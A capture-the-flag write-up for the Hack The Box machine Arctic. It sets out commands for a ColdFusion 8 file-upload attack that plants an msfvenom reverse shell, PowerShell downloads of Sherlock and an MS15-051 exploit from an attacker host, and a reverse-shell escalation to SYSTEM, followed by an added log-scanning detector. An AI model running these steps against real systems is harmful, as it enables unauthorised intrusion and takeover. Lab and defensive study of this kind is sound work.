HTB: Arctic
- TLDR -

...

Intro:

This was a decent box that just takes a bit of patience. It uses a couple of CVEs to get both user and root. The greatest nuisance of this box is that the website takes 30 seconds to load a page, so lots of patience is required.

Recon:

nmap -sT -sV -A -v <target ip> reveals ports 135, 8500, and 49154. 135 is the default port for the MSRPC Endpoint Mapper, which reveals which services are mapped to which ports. Using impacket's "rpcdump.py", we can see that port 49154 is associated with Task Scheduler. This indicates that we might be able to do some RCE. Nmap shows that port 8500 is fmtp, but doing some googling shows that it could also be the default webserver for Adobe ColdFusion. Navigating to the page shows that the latter is the case.

Getting User:

Checking Exploit DB reveals that Adobe ColdFusion 8 (our version) is vulnerable to an Arbitrary File Upload attack. There is a metasploit module that we can use as a framework for our custom attack [1].

The attack works by sending a POST request to a specific file on the server, pretending to upload a text file. We really upload a reverse shell jsp file, generated using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp -f jsp LHOST=<your ip> LPORT=3184 > cmd.jsp. Upload the shell, start a netcat listener, then navigate to the uploaded file, which is located at "http://<target ip>:8500/userfiles/file/cmd.jsp". We get a connection which allows us to get the user flag: type C:\Users\tolis\Desktop\user.txt.
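
From the defender's side, the upload-then-request sequence described above shows up in the web server's access log as a POST followed by a request for a script file under the upload directory. The scanner below is an added example, not part of the original write-up. It assumes Common Log Format, a 5-minute correlation window and an extension list of my choosing; the sample lines (including the /upload-endpoint placeholder) are constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Assumptions (not from the original page): Common Log Format, a 5-minute
# correlation window, and this list of server-executable extensions.
UPLOAD_PREFIX = "/userfiles/"          # upload directory named in the write-up
EXEC_EXT = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")
WINDOW = timedelta(minutes=5)
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def normalise(target):
    """Decode, lower-case and strip query/path parameters from a request target."""
    path = unquote(urlsplit(target).path).lower().replace("\\", "/")
    return "/".join(seg.split(";")[0] for seg in path.split("/"))

def find_upload_execution(lines):
    """Return alerts for script requests under the upload directory."""
    last_post = {}   # client ip -> time of its most recent POST
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], normalise(m["target"])
        if m["method"] == "POST":
            last_post[ip] = ts
        if path.startswith(UPLOAD_PREFIX) and path.endswith(EXEC_EXT):
            # A served script shortly after a POST from the same client is the
            # strongest signal; any script hit here is still worth a look.
            recent = ip in last_post and timedelta(0) <= ts - last_post[ip] <= WINDOW
            severity = "high" if recent and m["status"] == "200" else "medium"
            alerts.append({"ip": ip, "path": path,
                           "status": int(m["status"]), "severity": severity})
    return alerts

# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Sep/2021:10:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Sep/2021:10:02:10 +0000] "POST /upload-endpoint HTTP/1.1" 200 120',
    '203.0.113.9 - - [04/Sep/2021:10:02:45 +0000] "GET /userfiles/file/cmd.jsp HTTP/1.1" 200 0',
    '198.51.100.7 - - [04/Sep/2021:10:05:00 +0000] "GET /userfiles/file/report.pdf HTTP/1.1" 200 901',
    '198.51.100.8 - - [04/Sep/2021:10:06:00 +0000] "GET /UserFiles/File/x%2EJSP;a=1?y=2 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for alert in find_upload_execution(SAMPLE_LOG):
        print(alert)
```

An upload directory should normally serve static files only, so even the "medium" hits (probes that returned 404, or script requests with no preceding POST) deserve review.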

Upgrading to a PowerShell:

I didn't manage to successfully upload a reverse powershell, so instead we need to manually connect back with a new reverse powershell. To upgrade to a powershell, we can run a reverse powershell one-liner in the current shell: powershell -Command '<powershell one-liner>' [2].

Getting Root:

We can enumerate kernel vulnerabilities using Sherlock [3]. To upload the file, the most successful way is to create a webclient object and download the file through that:
$WebClient=New-Object System.Net.WebClient
$WebClient.DownloadFile("http://<your ip>/Sherlock.ps1", "C:\Users\tolis\AppData\Local\Temp\s.ps1")
Import-Module C:\Users\tolis\AppData\Local\Temp\s.ps1
Find-AllVulns

The final command will reveal all the potential vulnerabilities the system is affected by. In our case, we will attack MS15-051.

We can download an exploit from SecWiki [4] and upload it using the WebClient object we made (I uploaded it as "ms.exe"). Once it's been uploaded, we can confirm it works through: .\ms.exe "whoami", which will return nt authority\system. To get a root shell, we upload a reverse shell exe generated using msfvenom. Finally, start a netcat listener and run the reverse shell using the exploit: .\ms.exe .\rshl.exe. Get the root flag: type C:\Users\Administrator\Desktop\root.txt.




Resources:

[1] Adobe ColdFusion 8 AFU
[2] PowerShell One-Liner
[3] Sherlock PowerShell Script
[4] SecWiki MS15-051


Last edit: 2021.09.04